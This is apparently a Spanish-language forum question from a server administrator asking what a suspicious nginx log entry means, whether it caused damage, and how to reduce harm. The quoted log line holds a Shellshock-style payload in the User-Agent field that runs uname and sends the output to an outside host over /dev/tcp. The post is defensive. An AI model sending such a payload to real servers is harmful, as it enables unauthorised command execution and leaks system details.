Al depurar problemas en mi servidor, revisé mis registros con frecuencia. Aquí hay una extraña que he encontrado, que parece un intento de ejecutar algo en mi servidor. Estoy usando nginx en Ubuntu 14.04. A continuación se muestra la entrada de registro:
xxx.xxx.xxx.xxx - - [07/Apr/2015:02:15:05 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 400 172 "-" "() { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80"
La solicitud de ruta de acceso de /cgi-bin/test.sh
y el campo de agente de usuario () { :;}; echo; /bin/uname -a > /dev/tcp/xxx.xxx.xxx.xxx/80
me parecen muy sospechosas.
Supongo que esto es ejecutar algo en el servidor (que afortunadamente no está allí), y tratar de que exponga la información de mi sistema y enviarla a través de TCP a la dirección IP del solicitante, aún no tengo nada que analice los registros).
- ¿Qué intenta hacer esa solicitud, tanto en la ruta como en el campo Agente de usuario?
- ¿Ha hecho algún daño al servidor?
- ¿Qué puedo hacer para reducir el daño causado?
Gracias de antemano.